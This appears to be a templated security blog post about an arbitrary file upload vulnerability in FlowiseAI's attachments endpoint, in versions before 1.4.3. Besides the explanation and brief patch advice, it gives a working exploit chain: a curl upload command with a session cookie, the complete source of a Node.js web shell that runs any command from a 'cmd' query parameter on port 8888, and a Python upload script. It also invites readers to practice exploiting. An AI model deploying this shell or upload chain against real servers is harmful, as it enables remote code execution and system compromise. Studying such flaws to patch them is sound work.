Listen to this Post
This vulnerability exploits the file upload functionality in FlowiseAI’s `/api/v1/attachments/` endpoint. The system uses the Multer middleware for handling `multipart/form-data` but lacks essential security validations. It does not perform checks on file extensions, MIME types, or the magic bytes of the uploaded file’s content. An authenticated attacker can send a POST request with a malicious JavaScript file, which Multer processes and places in a temporary directory. The application’s controller then calls a service layer function, createFileAttachment, which moves the file from the temporary location to a permanent storage directory on the server’s filesystem. The function `addSingleFile` in the storage utilities is responsible for this final move operation. Crucially, the only filtering performed is on the filename itself, where dangerous directory traversal characters like `../` are sanitized, but no validation rejects files based on their type or content. This allows a Node.js web shell to be persistently stored. While the shell does not execute automatically, its presence on the server creates a persistent backdoor. This shell can then be triggered by an administrator accessing it inadvertently or via a separate vulnerability chained to achieve remote code execution, as the shell exposes an HTTP endpoint that can run arbitrary system commands.
Platform: FlowiseAI
Version: < 1.4.3
Vulnerability : Arbitrary File Upload
Severity: Critical
date: 2024-08-21
Prediction: 2024-09-04
What Undercode Say:
curl -X POST "http://localhost:3000/api/v1/attachments/0237eefc-18c5-46b2-8b3c-97aa516133fc/$(uuidgen)" -H "Cookie: jwt=ppBk33uGXmJmoj8zIAGgHOP-oQfb2b8yds7XQfqyRl0" -F "[email protected]"
const { exec } = require('child_process');
const http = require('http');
const server = http.createServer((req, res) => {
const url = new URL(req.url, 'http://localhost');
const cmd = url.searchParams.get('cmd');
if (cmd) {
exec(cmd, (error, stdout, stderr) => {
res.writeHead(200, {'Content-Type': 'text/plain'});
if (error) {
res.end(<code>Error: ${error.message}\n${stderr || ''}</code>);
} else {
res.end(stdout || 'Command executed successfully');
}
});
} else {
res.writeHead(200, {'Content-Type': 'text/html'});
res.end('
<h1>Node.js Web Shell</h1>
');
}
});
server.listen(8888, '0.0.0.0');
import requests
import uuid
url = f"http://localhost:3000/api/v1/attachments/0237eefc-18c5-46b2-8b3c-97aa516133fc/{str(uuid.uuid4())}"
headers = {'Cookie': 'jwt=ppBk33uGXmJmoj8zIAGgHOP-oQfb2b8yds7XQfqyRl0'}
files = {'files': ('shell.js', open('shell.js', 'rb'), 'application/javascript')}
r = requests.post(url, headers=headers, files=files)
How Exploit:
Authenticated file upload.
Web shell persistence.
Trigger for RCE.
Protection from this CVE
Update to v1.4.3.
Implement file-type validation.
Restrict executable directories.
Impact:
Remote Code Execution.
System compromise.
Data breach.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
